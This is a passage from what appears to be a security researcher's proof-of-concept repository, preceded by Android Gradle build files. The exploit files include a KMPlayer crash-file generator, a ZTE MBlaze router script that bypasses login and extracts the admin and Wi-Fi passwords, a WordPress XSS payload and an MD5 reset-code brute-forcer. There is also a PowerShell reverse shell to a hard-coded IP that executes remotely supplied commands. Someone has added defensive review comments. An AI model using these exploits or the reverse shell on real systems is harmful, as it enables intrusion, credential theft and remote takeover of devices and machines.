# Store the positional parameters it is called with in the global JVM_OPTS
# array, one array element per parameter. The caller invokes it through `eval`
# so that shell quoting inside the option strings decides the word boundaries.
splitJvmOpts() {
    JVM_OPTS=( "$@" )
}
161 | eval splitJvmOpts $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS
162 | JVM_OPTS[${#JVM_OPTS[*]}]="-Dorg.gradle.appname=$APP_BASE_NAME"
163 |
164 | exec "$JAVACMD" "${JVM_OPTS[@]}" -classpath "$CLASSPATH" org.gradle.wrapper.GradleWrapperMain "$@"
165 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradlew.bat:
--------------------------------------------------------------------------------
@if "%DEBUG%" == "" @echo off
@rem ##########################################################################
@rem
@rem Gradle startup script for Windows
@rem
@rem ##########################################################################

@rem Set local scope for the variables with windows NT shell
if "%OS%"=="Windows_NT" setlocal

@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
set DEFAULT_JVM_OPTS=

@rem APP_HOME is the directory holding this script; APP_BASE_NAME is the script name without extension.
set DIRNAME=%~dp0
if "%DIRNAME%" == "" set DIRNAME=.
set APP_BASE_NAME=%~n0
set APP_HOME=%DIRNAME%

@rem Find java.exe
if defined JAVA_HOME goto findJavaFromJavaHome

@rem No JAVA_HOME: a bare java.exe is resolved by the command search order.
@rem Setting JAVA_HOME explicitly avoids depending on that order (cmd.exe looks
@rem in the current directory before PATH), which matters in checkouts you do not trust.
set JAVA_EXE=java.exe
%JAVA_EXE% -version >NUL 2>&1
if "%ERRORLEVEL%" == "0" goto init

echo.
echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:findJavaFromJavaHome
@rem Strip any double quotes from JAVA_HOME before building the java.exe path.
set JAVA_HOME=%JAVA_HOME:"=%
set JAVA_EXE=%JAVA_HOME%/bin/java.exe

if exist "%JAVA_EXE%" goto init

echo.
echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:init
@rem Get command-line arguments, handling Windowz variants

if not "%OS%" == "Windows_NT" goto win9xME_args
if "%@eval[2+2]" == "4" goto 4NT_args

:win9xME_args
@rem Slurp the command line arguments.
set CMD_LINE_ARGS=
set _SKIP=2

:win9xME_args_slurp
if "x%~1" == "x" goto execute

set CMD_LINE_ARGS=%*
goto execute

:4NT_args
@rem Get arguments from the 4NT Shell from JP Software
set CMD_LINE_ARGS=%$

:execute
@rem Setup the command line

@rem The classpath is the wrapper jar stored inside the checkout. Verify that
@rem binary against Gradle's published wrapper checksums before running a
@rem wrapper from a repository you do not trust.
set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar

@rem Execute Gradle
@rem JAVA_OPTS, GRADLE_OPTS and CMD_LINE_ARGS are expanded unquoted into the
@rem command line, so they must come from a trusted environment.
"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%

:end
@rem End local scope for the variables with windows NT shell
if "%ERRORLEVEL%"=="0" goto mainEnd

:fail
rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
rem the _cmd.exe /c_ return code!
if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
exit /b 1

:mainEnd
if "%OS%"=="Windows_NT" endlocal

:omega
91 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/local.properties:
--------------------------------------------------------------------------------
1 | ## This file is automatically generated by Android Studio.
2 | # Do not modify this file -- YOUR CHANGES WILL BE ERASED!
3 | #
4 | # This file should *NOT* be checked into Version Control Systems,
5 | # as it contains information specific to your local configuration.
6 | #
7 | # Location of the SDK. This is only used by Gradle.
8 | # For customization when using a Version Control System, please read the
9 | # header note.
10 | sdk.dir=/Users/aabraham/Library/Android/sdk
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/settings.gradle:
--------------------------------------------------------------------------------
1 | include ':app'
2 |
--------------------------------------------------------------------------------
/KMPlayer 3.7.0.109 Integer division by zero DoS.py:
--------------------------------------------------------------------------------
#KMPlayer 3.7.0.109 Integer division by zero DoS.
#Author: Ajin Abraham - xboz
#http://opensecurity.in

# Writes fuzz.wav: a RIFF/WAVE header followed by 800000 filler bytes (Python 2).
# Header fields as encoded below (little-endian):
#   "RIFF" size=0x00103164, "WAVE", "fmt " chunk size=16
#   format=1 (PCM), channels=1, sample rate=22050, byte rate=176400
#   block align=4, bits per sample=0
#   "data" size=0x00103140, followed by 27 bytes of sample data
# NOTE(review): bits-per-sample is zero and both declared sizes are larger than
# the bytes actually written. The page does not say which field the player
# divides by; presumably the zero one. A parser should reject a fmt chunk
# whose channels, block align, bits-per-sample or rates are zero before doing
# any arithmetic on them, and clamp chunk sizes to the real file length.
header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
"\x5a\x00\x2f\x00\x67\x00\x0a")
exploit = header
exploit += "\x41" * 800000
# Any exception raised while writing is reported as a permissions problem.
try:
    print "[+] Creating POC"
    crash = open('fuzz.wav','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."
19 |
--------------------------------------------------------------------------------
/KMPlayer 3.9.1.130 Integer division by zero DoS.py:
--------------------------------------------------------------------------------
# Exploit Title: KMPlayer 3.9.1.130 Integer division by zero DoS.
# Date: 25-11-2014
# Author: Ajin Abraham
# Website: http://opensecurity.in
# Vendor Homepage: http://www.kmpmedia.net/
# Software Link: http://filehippo.com/download_kmplayer/download/7f497da5a4cda4032bf7e4a11c9e3131/
# Version: 3.9.1.130
# Tested on: Windows 7,8, 8.1

# Writes fuzz.wav: a RIFF/WAVE header followed by 800000 filler bytes (Python 2).
# Header fields as encoded below (little-endian):
#   "RIFF" size=0x00103164, "WAVE", "fmt " chunk size=16
#   format=1 (PCM), channels=1, sample rate=22050, byte rate=176400
#   block align=4, bits per sample=0
#   "data" size=0x00103140, followed by 27 bytes of sample data
# NOTE(review): bits-per-sample is zero and both declared sizes are larger than
# the bytes actually written. The page does not say which field the player
# divides by; presumably the zero one. A parser should reject a fmt chunk
# whose channels, block align, bits-per-sample or rates are zero before doing
# any arithmetic on them, and clamp chunk sizes to the real file length.
header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
"\x5a\x00\x2f\x00\x67\x00\x0a")
exploit = header
exploit += "\x41" * 800000

# Any exception raised while writing is reported as a permissions problem.
try:
    print "[+] Creating POC"
    crash = open('fuzz.wav','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."
25 |
--------------------------------------------------------------------------------
/MTS MBlaze Ultra Wi-Fi_ZTE AC3633 Exploit.py:
--------------------------------------------------------------------------------
1 | #Author: Ajin Abraham - xboz
2 | #http://opensecurity.in
3 | #Product MTS MBlaze 3G Wi-Fi Modem
4 | #System Version 107
5 | #Manufacturer ZTE
6 | #Model AC3633
7 | import requests
8 | import os
9 | import urllib2
10 | print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
11 | print "Vulnerabilities"
12 | print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
13 | url='http://192.168.1.1'
def find_between(s, first, last):
    """Return the text of `s` lying between `first` and the next `last`.

    The search for `last` begins right after the first occurrence of
    `first`. An empty string is returned when either marker is missing.
    """
    head = s.find(first)
    if head < 0:
        return ""
    begin = head + len(first)
    stop = s.find(last, begin)
    if stop < 0:
        return ""
    return s[begin:stop]
#Vulnerable Static Cookies
# The only credential sent is this fixed cookie, which the client sets itself;
# the author lists the device's acceptance of it as the login bypass.
# Defensive takeaway: an admin session must be a random, server-issued token
# checked against server-side state, never a constant flag value.
cookies = dict(iusername='logined')
#Login Bypass
login_url = url+'/en/index.asp'
print "\nAttempting Login :"+url
print '================='
# Reachability probe with a 1-second timeout.
try:
    response=urllib2.urlopen(url,timeout=1)
except:
    print "Cannot Reach : "+url
    # NOTE(review): bare `exit` is a name lookup, not a call, so the script does not stop here.
    exit
# Request the index page carrying only the static cookie.
r = requests.get(login_url, cookies=cookies)
print 'Status : ' + str(r.status_code)
34 | if "3g.asp" in r.text:
35 | print "Login Sucessfull!"
36 | #Information Gathering
37 | print "\nInformation"
38 | print "========="
39 | info_url=url+'/en/3g.asp'
40 | i= requests.get(info_url, cookies=cookies)
41 | ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
42 | subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
43 | gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
44 | print "IP : " +ip
45 | print "Subnet : "+subnet
46 | print "Gateway : " +gateway
47 | #Steal Login Password
48 | print "\nStealing Router Login Credentials"
49 | print "======================"
50 | login_pwd_url=url+'/en/password.asp'
51 | p = requests.get(login_pwd_url, cookies=cookies)
52 | print 'Status : ' + str(p.status_code)
53 | print 'Username : admin' #default
54 | passwd=find_between(p.text,'id="sys_password" value="','"/>')
55 | print 'Password : '+ passwd
56 | print '\nExtracting WPA/WPA2 PSK Key'
57 | print '================='
58 | #Wi-Fi Password Extraction
59 | wifi_pass_url=url+'/en/wifi_security.asp'
60 | s = requests.get(wifi_pass_url, cookies=cookies)
61 | print 'Status: ' + str(s.status_code)
62 | wpa=find_between(s.text,"wpa_psk_key]').val('","');")
63 | wep=find_between(s.text,"wep_key]').val('","');")
64 | print "WPA/WPA2 PSK : " + wpa
65 | print "WEP Key : " + wep
66 |
67 | print "\nOther Vulnerabilities"
68 | print "======================="
69 | print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
70 | print "\n2.Password Reset without old password and Session"
71 | print """
72 | POST /goform/formSyWebCfg HTTP/1.1
73 | Host: 192.168.1.1
74 | Content-Type: application/x-www-form-urlencoded
75 | Referer: http://192.168.1.1/en/password.asp
76 | Accept-Encoding: gzip,deflate,sdch
77 | Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
78 | Content-Length: 52
79 |
80 | action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
81 | """
82 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | PoC
2 | ===
3 |
4 | Proof of Concepts, Exploits
5 |
--------------------------------------------------------------------------------
/WordPress Clean And Simple Contact Form 4.4.0 XSS:
--------------------------------------------------------------------------------
1 | Author : Ajin Abraham
2 | Author Website: http://opensecurity.in
3 |
4 | Affected Product: WordPress Clean and Simple Contact Form
5 | Affected Version: <= 4.4.0
6 | Vendor: Meg Nicholas
7 | Vendor URL:
8 | http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/
9 | WP Plugin URL:
10 | https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/
11 |
12 | PoC:
13 |
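14 | Make a POST request to the page containing the contact form generated by
15 | "Clean and Simple Contact Form",
16 | with the POST data cscf[name]=" onfocus=alert(1) autofocus x=" (judging by the payload, the leading quote closes the HTML attribute that the submitted name is echoed into, so the value is written back without attribute escaping; the fix on the plugin side is to encode it on output, e.g. with WordPress's esc_attr()).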
17 |
18 | POST http://localhost/contact-us/
19 | cscf[name]=" onfocus=alert(1) autofocus x="
20 |
--------------------------------------------------------------------------------
/applock md5 bruteforce.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "bufio"
5 | "fmt"
6 | "os"
7 | "crypto/md5"
8 | "math/rand"
9 | "regexp"
10 | "strconv"
11 | "strings"
12 | "encoding/hex"
13 | "time"
14 |
15 | )
16 |
17 |
18 | const (
19 | Alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
20 | Numerals = "0123456789"
21 | Ascii = Alphabet + Numerals //+ "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:`"
22 | )
23 |
24 | type GeneratorExprRanges [][]byte
25 |
// seedAndReturnRandom returns a pseudo-random index in [0, n) drawn from
// math/rand's shared source. Despite its name it does not seed that source,
// and math/rand is not a cryptographic generator.
func seedAndReturnRandom(n int) int {
	pick := rand.Intn(n)
	return pick
}
29 |
// alphabetSlice returns the run of Ascii that starts at the first occurrence
// of from and stops just before the last occurrence of to. The slice is
// half-open, so the to character itself is not part of the result. An error is
// returned when from is located after to.
func alphabetSlice(from, to byte) (string, error) {
	lo, hi := string(from), string(to)
	begin := strings.Index(Ascii, lo)
	end := strings.LastIndex(Ascii, hi)
	if begin <= end {
		return Ascii[begin:end], nil
	}
	return "", fmt.Errorf("Invalid range specified: %s-%s", lo, hi)
}
38 |
// replaceWithGenerated builds a character pool from ranges, draws length
// characters from it with seedAndReturnRandom, and substitutes the result for
// the first occurrence of expresion inside *s.
//
// Each entry of ranges is a two-byte pair: `\w` adds Ascii, `\d` adds
// Numerals, and any other pair is resolved through alphabetSlice. An error is
// returned when alphabetSlice rejects a pair or when the pool ends up empty.
func replaceWithGenerated(s *string, expresion string, ranges [][]byte, length int) error {
	pool := ""
	for _, pair := range ranges {
		token := string(pair[0]) + string(pair[1])
		if token == `\w` {
			pool += Ascii
			continue
		}
		if token == `\d` {
			pool += Numerals
			continue
		}
		chunk, err := alphabetSlice(pair[0], pair[1])
		if err != nil {
			return err
		}
		pool += chunk
	}
	if pool == "" {
		return fmt.Errorf("Empty range in expresion: %s", expresion)
	}
	out := make([]byte, length)
	for i := range out {
		out[i] = pool[seedAndReturnRandom(len(pool))]
	}
	// Only the first occurrence is replaced, one template token per call.
	*s = strings.Replace(*s, expresion, string(out), 1)
	return nil
}
65 |
// findExpresionPos scans s for range tokens (an optional backslash, one
// alphanumeric, an optional '-', an optional second alphanumeric) and returns,
// for every match, the pair made of its first and last byte.
func findExpresionPos(s string) GeneratorExprRanges {
	rangeExp := regexp.MustCompile(`([\\]?[a-zA-Z0-9]\-?[a-zA-Z0-9]?)`)
	spans := rangeExp.FindAllStringIndex(s, -1)
	out := make(GeneratorExprRanges, 0, len(spans))
	for _, span := range spans {
		first, last := s[span[0]], s[span[1]-1]
		out = append(out, []byte{first, last})
	}
	return out
}
75 |
// rangesAndLength splits a generator token into the text before its last '{'
// and the length parsed by parseLength, passing parseLength's error through.
func rangesAndLength(s string) (string, int, error) {
	cut := strings.LastIndex(s, "{")
	body := s[:cut]
	n, err := parseLength(s)
	return body, n, err
}
81 |
// parseLength reads the decimal number between the last '{' of s and the final
// character of s. It returns 0 and an error when that text is not an integer.
func parseLength(s string) (int, error) {
	open := strings.LastIndex(s, "{")
	digits := s[open+1 : len(s)-1]
	n, convErr := strconv.Atoi(digits)
	if convErr != nil {
		return 0, fmt.Errorf("Unable to parse length from %v", s)
	}
	return n, nil
}
90 |
// Generate expands every "[ranges]{n}" token found in template into n
// characters drawn from the named ranges and returns the expanded string.
// The first error from rangesAndLength or replaceWithGenerated aborts the
// expansion and is returned with an empty string.
func Generate(template string) (string, error) {
	generatorsExp := regexp.MustCompile(`\[([a-zA-Z0-9\-\\]+)\](\{([0-9]+)\})`)
	out := template
	for _, loc := range generatorsExp.FindAllStringIndex(template, -1) {
		token := template[loc[0]:loc[1]]
		ranges, length, err := rangesAndLength(token)
		if err != nil {
			return "", err
		}
		if err = replaceWithGenerated(&out, token, findExpresionPos(ranges), length); err != nil {
			return "", err
		}
	}
	return out, nil
}
107 |
108 |
// main reads one line from stdin, lower-cases it, then loops: it draws a
// random 8-character candidate from Generate, hashes it with MD5, prints the
// attempt, and leaves the loop when the hex digest equals the line read.
//
// Defensive takeaway: a reset code kept as a bare, unsalted MD5 of a short
// alphanumeric string can be tested offline at hashing speed. A per-install
// salt with a deliberately slow password hash, or verification on a server
// that limits attempts, removes that exposure.
func main(){
	fmt.Println("MD5 Reset Code Bruteforcer for AppLock\nLength of Reset code is of 8 Char and contains only alpha numerics.\n")
	reader := bufio.NewReader(os.Stdin)
	fmt.Print("Enter MD5: ")
	// The read error is discarded.
	md5hash, _ := reader.ReadString('\n')
	md5hash = strings.ToLower(md5hash)
	fmt.Println("Cracking the MD5: ",md5hash)

	for{
		// Candidates are drawn at random, not enumerated; Generate's error is discarded.
		result, _ := Generate(`[a-z0-9]{8}`)
		data := []byte(result)
		x:=md5.Sum(data)
		hash:=hex.EncodeToString(x[:])
		fmt.Println(time.Now().UTC(), " Generated Code : ", result," MD5: ", hash)
		cmp:=hash == md5hash
		if cmp == true {
			fmt.Print("\n\n")
			fmt.Println(time.Now().UTC(), " Reset Code Cracked!")
			fmt.Println(time.Now().UTC(), " Reset Code: ", result, " MD5 Match: ", hash )
			break
		}
	}



}
135 |
--------------------------------------------------------------------------------
/csp.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/csp.gif
--------------------------------------------------------------------------------
/github_revoke_this_please.env:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/polyglot.html:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/reverse_shell.ps1:
--------------------------------------------------------------------------------
# Reverse-shell sample: opens an outbound TCP connection to a hard-coded host
# and port, then passes every chunk of text it receives to Invoke-Expression
# and writes the output back over the same socket.
#
# Notes for defenders:
#   - The observable behaviour is powershell.exe making a direct outbound TCP
#     connection and then evaluating network-supplied text.
#   - Script Block Logging (event ID 4104) records the TCPClient and
#     Invoke-Expression body; AMSI-aware endpoint protection sees the same text.
#   - Constrained Language Mode restricts New-Object to an allow-list of types.
#   - The session is plain ASCII with no encryption, so the banner string
#     written below is visible to network inspection.
try
{
    $client = New-Object System.Net.Sockets.TCPClient("52.33.204.74",1337)
    $stream = $client.GetStream()
    # 65536-byte zero-filled receive buffer.
    [byte[]]$bytes = 0..65535|%{0}

    #Send back current username and computername
    # The text imitates the PowerShell console start-up banner.
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    #Show an interactive PowerShell prompt
    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    # Read until the peer closes the connection (Read returns 0).
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        try
        {
            #Execute the command on the target.
            # Text from the socket is evaluated as PowerShell without any validation.
            $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
        }
        catch
        {
            Write-Warning "Something went wrong with execution of command on the target."
            Write-Error $_
        }
        # Append a fresh prompt and the most recent error record, then clear $error.
        $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        #Return the results
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    }
    $client.Close()
    # $listener is never assigned in this script, so this branch does not run
    # unless the variable already exists in the calling scope.
    if ($listener)
    {
        $listener.Stop()
    }
}
catch
{
    Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
    Write-Error $_
}
50 |
--------------------------------------------------------------------------------
/script.js:
--------------------------------------------------------------------------------
1 | alert("Hey I am from GitHub");
2 |
3 |
--------------------------------------------------------------------------------
/terminal-poc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/terminal-poc
--------------------------------------------------------------------------------